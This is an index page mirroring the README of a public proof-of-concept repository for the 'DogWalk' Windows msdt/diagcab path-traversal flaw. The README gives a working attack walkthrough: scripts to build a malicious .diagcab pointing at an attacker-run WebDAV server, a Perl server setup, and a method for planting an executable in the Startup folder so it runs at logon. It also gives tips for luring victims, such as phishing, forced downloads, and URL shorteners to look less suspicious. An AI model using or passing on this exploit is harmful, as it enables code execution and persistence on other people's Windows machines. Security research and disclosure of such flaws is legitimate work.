Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/ariary/DogWalk-rce-poc

🐾Dogwalk PoC (using diagcab file to obtain RCE on windows)
https://github.com/ariary/DogWalk-rce-poc

dogwalk microsoft pentest poc rce

Last synced: about 1 month ago
JSON representation

🐾Dogwalk PoC (using diagcab file to obtain RCE on windows)

Host: GitHub
URL: https://github.com/ariary/DogWalk-rce-poc
Owner: ariary
Fork: true (irsl/microsoft-diagcab-rce-poc)
Created: 2022-06-10T13:55:44.000Z (over 2 years ago)
Default Branch: master
Last Pushed: 2022-08-11T08:59:20.000Z (about 2 years ago)
Last Synced: 2024-06-06T18:58:41.389Z (3 months ago)
Topics: dogwalk, microsoft, pentest, poc, rce
Language: Perl
Homepage:
Size: 2.88 MB
Stars: 79
Watchers: 3
Forks: 14
Open Issues: 1
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - ariary/DogWalk-rce-poc - 🐾Dogwalk PoC (using diagcab file to obtain RCE on windows) (Perl)

README

Dogwalk Proof-of-Concept🐾

🚨 Disclaimer 🚨

The PoC allows an attacker to obtain Remote Code Injection on a Windows victim device. The goal of this repo is to make a PoC even more usable than the initial repo. DO NOT USE IT WITHOUT PRIOR AUTHORIZATION! Regarding the damage caused and the simplicity of exploitation, I hope Microsoft will fix it Update July 2022: Microsoft has not patched yet the vulnerability in msdt but Microsoft Defender is able to spot it

* [🧠 Understand it](#how-it-works)
* [🐾 Run it](#lets-get-it)
* [📺 Show Me](#%EF%B8%8F-wait-and-see)

***Core concept:*** path traversal vulnerability in Microsoft's Diagcab technology (`msdt`) that could lead to remote code execution.

You can find the full advisory in the [blog post](https://medium.com/@radimre83/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd)

The vulnerability has been reported for **2 years** (by [@irsl](https://github.com/irsl)) and still has **no fix**!

## How it works?

The Proof-of-Concept sets up a webdav server hosting a malicious `.diagcab` file that will perform a path transversal to write a malicious executable in `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`. Writing an executable in this folder will execute it each time the user starts the windows machine, this is called ***Boot Logon Autostart Execution***.

So, basically what we need is:
* webDAV server
* Malicious `.diagcab` file
* Malicious executable *(legit one or basic text file is sufficient for the PoC)*

### 🎬 Scenario

1. The victim will visit a link (phishing, social engineering, or whatever) that will download the `.diagcab` file

^{*(💡 use `Content-type: application/octet-stream` response header to make the Browser automaticaly downloading the file when browsing the url)*}

2. The victim click on the file download (could easily/accidentaly happen by just clicking on the browser download folder)
3. The cab file loads the webdav malicious executable -> ***(path transversal)*** downloaded in Start up menu
4. The user restart his device -> ***(RCE)***

## Let's get it

If you are too lazy (or in a hurry) to proceed step-by-steps:
```shell
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
```

Otherwise ↓↓

### 🔨 Craft the `.diagcab` file

* `.diagcfg` are simple XML files that hold reference to one or more diagnostic packages and provide meta information about them
* They are packaged into Microsoft cabinet file archives and saved with `.diagcab` extension.

Firt build `custom.diagcfg`:
```shell
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
```

And build the `hotfix895214.diagcab`:
```shell
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
```

Finally, move it in the `./webdav/diagcab-webdav-poc/config` directory

### 🏗️ Set up the server

Put the executable you want to transfer on victim machine within `./webdav/malicious` directory... ^{*(Here we use the classic `calc.exe`)*}

...And launch the server:
```
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
```

The malicious `.diagcab` is available at `https://[WEBDAV_URL]/config/hotfix895214.diagcab`. You now have to lure a victim to click on this link.

^{*(💡you can use URL shortener to make it appears less suspicious)*}

### 👁️ Wait and see

Dogwalk set up

💡 by default, it seems that webdav communication are not enabled. See mitigations.txt to get a workaround to make it work

🐾🐾

![demo](https://github.com/ariary/Dogwalk-rce-poc/blob/master/img/dogwalk_exploit.gif)